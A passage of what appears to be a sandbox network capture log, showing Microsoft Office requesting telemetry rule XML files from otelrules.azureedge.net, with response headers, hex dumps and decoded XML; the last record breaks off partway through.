                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120674" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          88192.168.2.44985313.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:45 UTC192OUTGET /rules/rule120676v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:45 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:45 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 472
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                          ETag: "0x8DC582B984BF177"
                                                                                                                          x-ms-request-id: f0065933-d01e-0017-6091-1cb035000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162145Z-17db6f7c8cffhvbz3mt0ydz7x4000000038000000000f590
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:45 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120676" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          89192.168.2.44985213.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:45 UTC192OUTGET /rules/rule120675v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:45 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:45 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 419
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                          ETag: "0x8DC582BA6CF78C8"
                                                                                                                          x-ms-request-id: 7d3f2e15-101e-00a2-5aca-1a9f2e000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162145Z-17db6f7c8cfhzb2znbk0zyvf6n00000004r000000000ecre
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:45 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 55 75 5d 5b 50 70 5d 5b 43 63 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 55 75 5d 5b 44 64 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120675" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <SR T="2" R="([Uu][Pp][Cc][Ll][Oo][Uu][Dd])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          90192.168.2.44985513.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:45 UTC192OUTGET /rules/rule120678v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:45 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:45 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 468
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                          ETag: "0x8DC582BBA642BF4"
                                                                                                                          x-ms-request-id: 5a424671-801e-00ac-17e6-1cfd65000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162145Z-17db6f7c8cfjxfnba42c5rukwg00000001zg00000000gd89
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:45 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120678" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          91192.168.2.44985913.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:45 UTC192OUTGET /rules/rule120682v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:46 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:45 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 501
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:18 GMT
                                                                                                                          ETag: "0x8DC582BACFDAACD"
                                                                                                                          x-ms-request-id: 35556aea-401e-0064-3048-1c54af000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162145Z-17db6f7c8cfbr2wt66emzt78g400000004hg00000000fm9e
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:46 UTC501INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 74 61 72 74 75 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120682" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <R T="2" R="120100" /> <SS T="3" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> </S> <C T="


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          92192.168.2.44985613.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:45 UTC192OUTGET /rules/rule120679v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:46 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:46 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 174
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                                                          ETag: "0x8DC582B91D80E15"
                                                                                                                          x-ms-request-id: 9ad66ff1-501e-00a0-38ec-1a9d9f000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162146Z-17db6f7c8cfwtn5x6ye8p8q9m000000003s0000000005sh8
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:46 UTC174INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120679" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> </S> <T> <S T="1" /> </T></R>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          93192.168.2.44985813.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:46 UTC192OUTGET /rules/rule120681v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:46 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:46 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 958
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:58 GMT
                                                                                                                          ETag: "0x8DC582BA0A31B3B"
                                                                                                                          x-ms-request-id: 1a8c6bd5-d01e-0014-0747-1ced58000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162146Z-17db6f7c8cf6qp7g7r97wxgbqc00000004cg00000000d70t
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:46 UTC958INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120681" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120608" /> <R T="2" R="120680" /> <TH T="3"> <O T="AND"> <L> <O T="EQ"> <L>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          94192.168.2.44985713.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:46 UTC192OUTGET /rules/rule120680v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:46 UTC563INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:46 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 1952
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                          ETag: "0x8DC582B956B0F3D"
                                                                                                                          x-ms-request-id: 745077d4-d01e-0082-7c4a-1ce489000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162146Z-17db6f7c8cffhvbz3mt0ydz7x4000000037000000000gyvn
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:46 UTC1952INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 31 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120680" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <SS T="1" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> <R T="2" R="120682" /> <F T="3"> <O T="LT"> <L>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          95192.168.2.44986013.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:46 UTC193OUTGET /rules/rule120602v10s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:46 UTC563INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:46 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 2592
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                          ETag: "0x8DC582BB5B890DB"
                                                                                                                          x-ms-request-id: e5b5a791-201e-0071-25a3-1bff15000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162146Z-17db6f7c8cf96l6t7bwyfgbkhw000000041g00000000ega0
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:46 UTC2592INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 32 22 20 56 3d 22 31 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 6e 64 4c 61 6e 67 75 61 67 65 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120602" V="10" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAndLanguage" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa=


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          96192.168.2.44986113.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:46 UTC192OUTGET /rules/rule120601v3s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:46 UTC563INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:46 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 3342
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:34 GMT
                                                                                                                          ETag: "0x8DC582B927E47E9"
                                                                                                                          x-ms-request-id: 2eee43c6-d01e-0066-0203-1bea17000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162146Z-17db6f7c8cf5mtxmr1c51513n000000005ag000000007xn5
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:46 UTC3342INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 4f 53 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120601" V="3" DC="SM" EN="Office.System.SystemHealthMetadataOS" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns=""> <RI


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          97192.168.2.44986313.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:46 UTC192OUTGET /rules/rule701201v1s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:46 UTC563INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:46 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 1393
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:27:51 GMT
                                                                                                                          ETag: "0x8DC582BE3E55B6E"
                                                                                                                          x-ms-request-id: 588a334f-a01e-0098-1acf-1a8556000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162146Z-17db6f7c8cf6qp7g7r97wxgbqc00000004c000000000dxcq
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:46 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml"


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          98192.168.2.44986513.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:46 UTC192OUTGET /rules/rule700201v1s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:46 UTC563INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:46 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 1393
                                                                                                                          Connection: close
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Vary: Accept-Encoding
